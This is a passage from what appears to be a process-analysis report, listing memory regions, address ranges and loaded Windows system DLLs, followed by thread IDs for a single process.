0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 6113 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6114 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6115 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 6116 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 6119 start_va = 0x3105d10000 end_va = 0x3105d13fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d10000" filename = "" Region: id = 6120 start_va = 0x3105d20000 end_va = 0x3105d20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d20000" filename = "" Region: id = 6121 start_va = 0x3105d30000 end_va = 0x3105d3ffff entry_point = 0x0 region_type = private name = "private_0x0000003105d30000" filename = "" Region: id = 6122 start_va = 0x31074b0000 end_va = 0x3107567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000031074b0000" filename = "" Region: id = 6123 start_va = 0x3107570000 end_va = 0x31075effff entry_point = 0x0 region_type = private name = "private_0x0000003107570000" filename = "" Region: id = 6124 start_va = 0x7ff716dd7000 end_va = 0x7ff716dd8fff entry_point = 0x0 region_type = private name = "private_0x00007ff716dd7000" filename = "" Region: id = 6125 start_va = 0x7ffbfe9a0000 end_va = 0x7ffbfe9c1fff entry_point = 0x7ffbfe9a0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 6126 start_va = 0x7ffbff170000 end_va = 0x7ffbff205fff entry_point = 0x7ffbff170000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 6127 start_va = 0x7ffc01540000 end_va = 0x7ffc015e4fff entry_point = 0x7ffc01540000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 6128 start_va = 0x3105d40000 end_va = 0x3105d40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d40000" filename = "" Region: id = 6129 start_va = 0x7ffbf9f60000 end_va = 0x7ffbf9f7cfff entry_point = 0x7ffbf9f60000 region_type = mapped_file name = "wdi.dll" filename = "\\Windows\\System32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll") Region: id = 6134 start_va = 0x3105d50000 end_va = 0x3105d51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d50000" filename = "" Region: id = 6135 start_va = 0x3105d70000 end_va = 0x3105d71fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003105d70000" filename = "" Region: id = 6136 start_va = 0x31075f0000 end_va = 0x310766ffff entry_point = 0x0 region_type = private name = "private_0x00000031075f0000" filename = "" Region: id = 6137 start_va = 0x7ff716dd5000 end_va = 0x7ff716dd6fff entry_point = 0x0 region_type = private name = "private_0x00007ff716dd5000" filename = "" Region: id = 6138 start_va = 0x7ffbed470000 end_va = 0x7ffbed50dfff entry_point = 0x7ffbed470000 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 6139 start_va = 0x7ffbfb2c0000 end_va = 0x7ffbfb2c9fff entry_point = 0x7ffbfb2c0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 6140 start_va = 0x7ffbfb2d0000 end_va = 0x7ffbfb543fff entry_point = 0x7ffbfb2d0000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Region: id = 6141 start_va = 0x7ffbfb910000 end_va = 0x7ffbfb941fff entry_point = 0x7ffbfb910000 region_type = mapped_file name = "rstrtmgr.dll" filename = "\\Windows\\System32\\RstrtMgr.dll" (normalized: "c:\\windows\\system32\\rstrtmgr.dll") Region: id = 6142 start_va = 0x7ffbfc6c0000 end_va = 0x7ffbfc6d6fff entry_point = 0x7ffbfc6c0000 region_type = mapped_file name = "radarrs.dll" filename = "\\Windows\\System32\\radarrs.dll" (normalized: "c:\\windows\\system32\\radarrs.dll") Region: id = 6143 start_va = 0x7ffc00370000 end_va = 0x7ffc003a5fff entry_point = 0x7ffc00370000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 6144 start_va = 0x7ffc003b0000 end_va = 0x7ffc003d5fff entry_point = 0x7ffc003b0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 6145 start_va = 0x7ffc006c0000 end_va = 0x7ffc006e7fff entry_point = 0x7ffc006c0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 6146 start_va = 0x7ffc008a0000 end_va = 0x7ffc008e9fff entry_point = 0x7ffc008a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 6147 start_va = 0x7ffc008f0000 end_va = 0x7ffc00902fff entry_point = 0x7ffc008f0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 6148 start_va = 0x7ffc00940000 end_va = 0x7ffc00f67fff entry_point = 0x7ffc00940000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 6149 start_va = 0x7ffc00fc0000 end_va = 0x7ffc01072fff entry_point = 0x7ffc00fc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 6150 start_va = 0x7ffc01640000 end_va = 0x7ffc016e5fff entry_point = 0x7ffc01640000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6151 start_va = 0x7ffc022c0000 end_va = 0x7ffc037e4fff entry_point = 0x7ffc022c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 6152 start_va = 0x7ffc03a50000 end_va = 0x7ffc03aa0fff entry_point = 0x7ffc03a50000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 6153 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Thread: id = 107 os_tid = 0x758 Thread: id = 108 os_tid = 0xdf0 Thread: id = 109 os_tid = 0xda8 Thread: id = 110 os_tid = 0xe00 Thread: id = 111 os_tid = 0xdec Thread: id = 112 os_tid = 0xe08